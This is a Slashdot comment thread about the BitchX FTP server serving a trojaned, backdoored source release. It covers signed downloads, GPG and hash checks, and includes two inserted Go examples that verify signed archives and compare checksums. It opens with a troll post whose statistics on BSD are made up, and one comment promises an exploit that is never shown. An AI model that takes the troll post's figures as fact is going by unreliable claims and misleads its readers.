Netcraft has now confirmed: BSD is dying. Yet another crippling bombshell hit the beleaguered BSD community when recently IDC confirmed that BSD accounts for less than a fraction of 1 percent of all servers. Coming on the heels of the latest Netcraft survey which plainly states that BSD has lost more market share, this news serves to reinforce what we've known all along: BSD is collapsing in complete disarray, as further exemplified by failing dead last in the recent Sys Admin comprehensive networking test. You don't need to be a Kreskin to predict BSD's future. The hand writing is on the wall: BSD faces a bleak future. In fact there won't be any future at all for BSD because BSD is dying. Things are looking very bad for BSD. As many of us are already aware, BSD continues to lose market share. Red ink flows like a river of blood. FreeBSD is the most endangered of them all, having lost 93% of its core developers. Let's keep to the facts and look at the numbers. OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many users of NetBSD are there? Let's see. The number of OpenBSD versus NetBSD posts on Usenet is roughly in ratio of 5 to 1. Therefore there are about 7000/5 = 1400 NetBSD users. BSD/OS posts on Usenet are about half of the volume of NetBSD posts. Therefore there are about 700 users of BSD/OS. A recent article put FreeBSD at about 80 percent of the BSD market. Therefore there are (7000+1400+700)*4 = 36400 FreeBSD users. This is consistent with the number of FreeBSD Usenet posts. Due to the troubles of Walnut Creek, abysmal sales and so on, FreeBSD went out of business and was taken over by BSDI who sell another troubled OS. Now BSDI is also dead, its corpse turned over to yet another charnel house. All major surveys show that BSD has steadily declined in market share. BSD is very sick and its long term survival prospects are very dim. If BSD is to survive at all it will be among OS hobbyist dabblers. BSD continues to decay. Nothing short of a miracle could save it at this point in time. For all practical purposes BSD is dead. BSD is dying.

Please read the article... (1, Redundant)

Snard (61584) | more than 11 years ago | (#3806984)

The linked article gives a bit more insight into the REAL problem... It appears that someone has hacked the FTP server, and it is now serving up a trojan'ed copy of the aforementioned BitchX distribution, but only part of the time (based on the IP address and/or connectivity of the client). Rather sneaky...

Anyway, I guess this is a good reason to have some sort of "signing" on your distribution.

This may be an indication (2)

boa13 (548222) | more than 11 years ago | (#3806985)

... that Linux is gaining popularity among the crackers. This scenario is well known and has been explained for years. But it remained largely theoretical until this year, it seems to me.

So, now we can expect people that mostly ignored us to come and crack our servers, install backdoors into our releases. They're probably going to write better viruses, too. I guess this is the price you pay when you become mainstream.

For years we've told the world how secure our OS was. Err, could be, once configured properly. The time has come, now, to do this.

trouble (0)

tps12 (105590) | more than 11 years ago | (#3807002)

Uh oh. Now hackers are going to be able to access my valuable collection of smileys.

That can't be! (-1, Troll)

Anonymous Coward | more than 11 years ago | (#3807004)

Tell me it ain't so. Something insecure in a Linux/Unix app?

My Redhat for dummies says this thing is secure!

Backdoor. (4, Interesting)

ldopa1 (465624) | more than 11 years ago | (#3807007)

Is this truly surprising? With the proliferation of "secret" functionality in everything from DVDs [dvdeastereggs.com] to Palm applications [palmlife.com], it seems that a lot of developers take great delight in doing something "on the sly" that will get them noticed.

While the vast majority of these "easter eggs" are completely harmless, it's only logical to assume that they present an opportunity for malicous activities. I mean, who among us doesn't have SOME "H4X0R" history? Doesn't it follow that some of that will come out when the opportunity to put in a "gift" presents itself?

Also, this seems to me to be one of the down sides of the Open Source fight. Most of the accomplished hackers that I know are strong advocates of Open Source. It leads me to believe that most of the proponents of Open Source are or were at some time at least a script kiddie with delusions of grandeur.

Nobody I know has the time to actually check every line of code in a 200 Meg build for one or two lines of backdoor code, especially when the application is DESIGNED to make and break connections.

Re:Backdoor. (2, Interesting)

numatrix (242325) | more than 11 years ago | (#3807056)

This was not the developers doing something sly. There has been a recent rash of compromised servers hosting different pieces of software, and then backdoors being configured in a similar manner in the ./configure script as described in this post. Similarly hit was monkey.org [monkey.org] where some of dug song's security tools were compromised. Google cache of dug's post [216.239.37.100].

There was another relatively famous piece of software compromised the same way recently as well. Somebody is going through some great lengths to put backdoors in the source of some good OSS. Makes you wonder how much is being missed.

Re:Backdoor. (1)

ldopa1 (465624) | more than 11 years ago | (#3807105)

Amen to that. I similarly wonder how many viruses are out there that nobody except the authors know about? Hundreds? Thousands?

Speaking of which, if there is a virus that exploits a backdoor (a la CodeRed) in a server, why can't you author a counter-virus? One that exploits the same back door, goes in, removes the virus and closes the backdoor? Then it waits, listening for other CodeRed viruses to attempt a breach, go to that compromised server and kill the virus there ad infinitum until there are no more requests for X cycles? Has anyone thought of this?

Re:Backdoor. (2)

Marx_Mrvelous (532372) | more than 11 years ago | (#3807145)

There are probably very few viruses that only the author knows about; the number of different viruses in the wild is actually very, very low.

And people have discussed using so-called "anti-viruses" but there are too many legal issues to deal with. If people just patch their boxes, problem solved.

Re:Backdoor. (0)

getter_85 (464748) | more than 11 years ago | (#3807208)

Someone has, but people don't like the idea of something going in and out of their box without knowing of it first.

Digitally sign your sources... (5, Informative)

Cyclops (1852) | more than 11 years ago | (#3807009)

Many don't digitally sign their sources with a secure key, and thus there is absolutely no way to verify that those sources are the ones the developer intended to release.

Many think that a simple md5sum alongside the sources is enough. IT IS NOT. Any attacker who replaces the sources can as easily replace the md5sum, which can be generated by anyone.

A digital signature (I suggest using gpg) can only be generated by YOU if you keep it in a secure place, and use it to sign the sources. The public side of this key should be widely distributed and preferably signed (that is, recognized) by third parties... the more trustworthy these third parties are, the better.

After the huge attack on the network where such sites as Apache were hosted, other Apache projects which did not sign their packages suddenly started signing them. They got scared. You should be too.

A lot of people instinctively trust their dns resolutions (oops) and also think that if they go to http://www.mozilla.org they will get their favorite browser for sure. They are also wrong. dns can be spoofed under certain conditions, so they could be going to crackersR.us instead, and downloading a neat trojaned source, for instance.

The more a project grows in fame, the more it will become a likely target for these kinds of attacks, so the more need there is for a degree of responsibility that should not be necessary, but unfortunately is, since the danger is ubiquitous.

Be careful, be very careful.

Also avoid using user root period.

watch out! (0, Redundant)

Marque_Off (589454) | more than 11 years ago | (#3807015)

According to the bugtraq post, when you downloaded the file, sometimes you received the backdoored version, and other times you didn't. From the post, "There is something very strange going on with the FTP server on BitchX.com serving trojaned and clean versions, depending on the originating IP [...] what appears to be client / client-behavior based (we're not sure exactly what)."

I am disappointed that the server had been 0wned (more than likely). Sad that the developers didn't notice sooner, and it makes you wonder how many boxes have now additionally been 0wned.

Will it take to find such backdoor if this software was closed-source?

There is a nasty vuln in Slashcode. This was used a day or so ago on slashdot.org, resulting in the site being taken down for an hour or so, yet no mention was made of the problem elsewhere so that other sites can patch themselves. The maintainers of slashcode have silently fixed this in CVS but have not even mentioned it anywhere that I can find. This leaves all sites using slash vulnerable to this exploit. No wonder there are so many "trolls" on slashdot.org... ah well.

An example exploit (incomplete) is as follows:

GNU/Linux needs signed downloads (5, Insightful)

splorf (569185) | more than 11 years ago | (#3807032)

I'm sorry but this is one thing Microsoft and/or Netscape did right. The practice of including detached PGP signatures on download sites is useless--they have to be manually verified, and hardly anyone bothers.

GNU/Linux downloads should be in signed archives like Netscape JAR files. JAR files are basically ZIP archives with a signature file stored inside the .zip in a standard place. When you unpack the archive, the unpacker checks the signature the same way a browser checks an SSL web site.

JAR files use a certificate chain ending in a certificate authority (usually a commercial one) but maybe the signed-download scheme could be signed against a certificate on the official developer's website. Of course that wouldn't be unspoofable, but it would be as secure as the current scheme of having a PGP public key on the developer website and signing against that. The main benefit is the checking would happen automatically, so it would be much harder to put crap into downloads. If someone makes a modified version, they would have to sign it themselves (with a signature pointing back to their own website) or else the unpacker would print a message saying the code was unsigned and the user should check it carefully before using it.
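What the poster describes, an archive that carries its own signature and an unpacker that refuses to hand anything back unless that signature verifies, as an added example in Go (not Netscape's JAR code and not part of the page or of BitchX): the packer adds two extra members, a manifest listing every payload file with its SHA-256 and an Ed25519 signature over that manifest; the unpacker reads the archive, checks the signature under a public key the installer was configured with, checks that the payload matches the manifest exactly, and only then returns the files. The member names META-INF/MANIFEST and META-INF/release.sig are an assumed layout borrowed from the JAR idea, Ed25519 from the Go standard library stands in for the developer's PGP key, and any file names or contents fed to it are constructed. A copy with one member swapped on the server still carries a valid signature over the old manifest, which is why the manifest comparison is the step that catches it.

```go
package main

import (
	"archive/tar"
	"bytes"
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
	"sort"
)

// Assumed layout, borrowed from the JAR idea: two reserved members carry the
// manifest and the detached signature over it.
const (
	manifestMember = "META-INF/MANIFEST"
	sigMember      = "META-INF/release.sig"
)

// manifest lists every payload member with its SHA-256, sorted by name so that
// signer and verifier serialise identical bytes.
func manifest(files map[string][]byte) []byte {
	names := make([]string, 0, len(files))
	for n := range files {
		names = append(names, n)
	}
	sort.Strings(names)
	var b bytes.Buffer
	for _, n := range names {
		sum := sha256.Sum256(files[n])
		fmt.Fprintf(&b, "%s %s\n", hex.EncodeToString(sum[:]), n)
	}
	return b.Bytes()
}

func writeTar(members map[string][]byte) ([]byte, error) {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	for name, data := range members {
		hdr := &tar.Header{Name: name, Mode: 0o644, Size: int64(len(data)), Typeflag: tar.TypeReg}
		if err := tw.WriteHeader(hdr); err != nil {
			return nil, err
		}
		if _, err := tw.Write(data); err != nil {
			return nil, err
		}
	}
	if err := tw.Close(); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

// Pack is the developer's step: payload, manifest, signature over the manifest.
func Pack(files map[string][]byte, priv ed25519.PrivateKey) ([]byte, error) {
	all := make(map[string][]byte, len(files)+2)
	for n, d := range files {
		all[n] = d
	}
	all[manifestMember] = manifest(files)
	all[sigMember] = ed25519.Sign(priv, all[manifestMember])
	return writeTar(all)
}

// Unpack is what the installer runs. Nothing is handed back unless the signature
// verifies under pub (the key the installer was configured with) and the payload
// matches the signed manifest exactly, so an added, dropped or altered member fails.
func Unpack(archive []byte, pub ed25519.PublicKey) (map[string][]byte, error) {
	tr := tar.NewReader(bytes.NewReader(archive))
	members := map[string][]byte{}
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			break
		} else if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(tr)
		if err != nil {
			return nil, err
		}
		members[hdr.Name] = data
	}
	m, sig := members[manifestMember], members[sigMember]
	if m == nil || sig == nil {
		return nil, errors.New("archive is unsigned: inspect it before using it")
	}
	if !ed25519.Verify(pub, m, sig) {
		return nil, errors.New("signature does not verify under the configured key")
	}
	delete(members, manifestMember)
	delete(members, sigMember)
	if !bytes.Equal(manifest(members), m) {
		return nil, errors.New("payload does not match the signed manifest")
	}
	return members, nil
}
```

The unpacker trusts only the key it was configured with, so the question "is this the developer's key?" is moved out of the download path and answered once, when the installer is set up, which is the same place the current scheme leaves it; what changes is that the check runs on every unpack without the user having to remember it.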

Re:GNU/Linux needs signed downloads (3, Informative)

bogado (25959) | more than 11 years ago | (#3807139)

RPM does this, and most rpm managers do exactly this (red-carpet for instance). I bet debian has the same type of protection. If you only install software from trusted distributors, you should be fine.

Re:GNU/Linux needs signed downloads (1)

jeffy124 (453342) | more than 11 years ago | (#3807142)

actually, JAR files are a Sun thing, not Netscape or MS. It stands for Java ARchive. But your point is correct - signed archives are a good thing. IIRC, MS does something like this within Windows Update when you patch your box.

Enough talk (3, Funny)

WildBeast (189336) | more than 11 years ago | (#3807138)

Grow up, nothing is perfectly secure. Let's stop arguing which OS is vulnerable and find the evil do-ers who did this. Let's smoke them out from their parents' basement and deliver a Slashdot can of whoop ass.

Jesus, I'm so dumb (-1, Offtopic)

ellem (147712) | more than 11 years ago | (#3807162)

I can't even find the front door...

Fortunately a window on the West side of the house is ajar... to the East the mountains are impassable.

HA HA HA HA HA (1, Interesting)

Anonymous Coward | more than 11 years ago | (#3807164)

. . .What separates Irssi from ircII, BitchX, epic and the rest of the text clients? The code. I'm not using the crappy ugly kludgy code of ircII. Non-developers probably don't care that much about it, but that means a few good things anyway:

Security - I'm quite confident that there's no security bugs in Irssi. No buffer overflows, no format bugs (%s%s%s), no remote exploits, nothing.

Modularity - Irssi is highly extensible, you could change almost anything in Irssi with a runtime loadable module. And you can probably change anything you actually need to change with a Perl script.

FreeBSD port (0)

Anonymous Coward | more than 11 years ago | (#3807166)

It's a wonder that this was not noticed quicker due to the FreeBSD ports system having the md5 hash for the good copy. I would think that grabbing the bad copy and having an md5 mismatch would raise some questions... I wonder how long it's been sending out bad copies. I guess fetch was allowed to get the correct one.
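The three checks that come up in this thread, the .md5 file next to the tarball that Cyclops says is worthless, the hash pinned in the ports tree that this poster expected to catch the swap, and a detached signature under the developer's key, side by side in an added example (Go, not code from the page, from BitchX or from the ports tree). A constructed release is served clean and then trojaned the way the FTP server was. The same-server .md5 is regenerated by the attacker and still matches. A hash committed out of band (the way a port's distinfo is) catches the swap, but only if the maintainer was served a clean copy when computing it, which is exactly what IP-dependent serving makes uncertain. A detached signature under a key the attacker does not hold fails regardless of which copy anyone was served. Ed25519 from the Go standard library stands in for the developer's GPG key, and MD5 is kept because that is what the tooling of the day compared: the point is where the reference value comes from, not which hash function it is. The tarball contents are constructed stand-ins.

```go
package main

import (
	"crypto/ed25519"
	"crypto/md5"
	"crypto/rand"
	"encoding/hex"
	"fmt"
)

// Release is what a download site serves: the tarball plus whatever
// "verification" material sits next to it on the same server.
type Release struct {
	Tarball []byte
	MD5File string // contents of the sidecar .md5 file served beside the tarball
	Sig     []byte // detached signature over the tarball
}

// Outcome records which checks a downloaded copy passes.
type Outcome struct {
	SidecarMD5 bool // tarball matches the .md5 file from the same server
	PinnedMD5  bool // tarball matches a hash committed out of band (a port's distinfo)
	Signature  bool // detached signature verifies under the developer's public key
}

func md5Hex(b []byte) string {
	sum := md5.Sum(b)
	return hex.EncodeToString(sum[:])
}

// Publish is the developer's step, run once on the machine that holds the
// private key: tarball, sidecar hash and detached signature.
func Publish(tarball []byte, priv ed25519.PrivateKey) Release {
	return Release{
		Tarball: tarball,
		MD5File: md5Hex(tarball),
		Sig:     ed25519.Sign(priv, tarball),
	}
}

// Trojan is the attacker's step after gaining write access to the FTP server:
// swap the tarball and regenerate everything that needs no secret. The old
// signature is left in place because it cannot be regenerated without the key.
func Trojan(r Release, backdoored []byte) Release {
	return Release{
		Tarball: backdoored,
		MD5File: md5Hex(backdoored),
		Sig:     r.Sig,
	}
}

// Verify runs the three checks a downloader might apply. distinfoMD5 and pub
// are the out-of-band references: neither came from the download site.
func Verify(r Release, distinfoMD5 string, pub ed25519.PublicKey) Outcome {
	return Outcome{
		SidecarMD5: md5Hex(r.Tarball) == r.MD5File,
		PinnedMD5:  md5Hex(r.Tarball) == distinfoMD5,
		Signature:  ed25519.Verify(pub, r.Tarball, r.Sig),
	}
}

// Scenario plays the incident out with constructed stand-ins for the source
// tarball. It returns the outcomes for a client served the clean copy and for
// a client served the backdoored copy, both checking against references that
// were computed from the clean copy.
func Scenario() (clean, trojaned Outcome, err error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return
	}
	genuine := []byte("constructed stand-in for the genuine source tarball\n")
	backdoored := []byte("constructed stand-in for the tarball with a modified configure script\n")

	rel := Publish(genuine, priv)
	distinfo := md5Hex(genuine) // the port maintainer computed it from a clean download

	clean = Verify(rel, distinfo, pub)
	trojaned = Verify(Trojan(rel, backdoored), distinfo, pub)
	return
}

func main() {
	clean, trojaned, err := Scenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("clean copy:    %+v\n", clean)
	fmt.Printf("trojaned copy: %+v\n", trojaned)
}
```

If the maintainer had been one of the clients served the trojaned copy, distinfo would carry the trojaned hash and PinnedMD5 would pass for the bad file and fail for the good one, which is the limitation of any hash that is pinned by downloading; the signature check does not have that failure mode because the reference (the public key) is independent of any particular download.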

Ain't that a Bitch ...X (-1)

Anonymous Coward | more than 11 years ago | (#3807167)

I'm such a wit..... ok, a half wit

If you were using a Trusted Computing machine . . (5, Funny)

vegetablespork (575101) | more than 11 years ago | (#3807182)

. . . you wouldn't be vulnerable to back doors inserted by rogue programmers in configure scripts. You would only be vulnerable to back doors authorized by Microsoft and the U.S. Government to prevent piracy and terrorism.

GnuPG (2, Insightful)

giminy (94188) | more than 11 years ago | (#3807194)

If more people used GnuPG [gnupg.org] and checked the signatures on their software, we wouldn't have to worry as much about backdoored software (assuming, of course, that you trust the original author. And if you don't, then you shouldn't be using their software now should you?). One of these days someone is going to do something like this with something major, like the kernel, and it's going to affect a lot of people. So start checking now!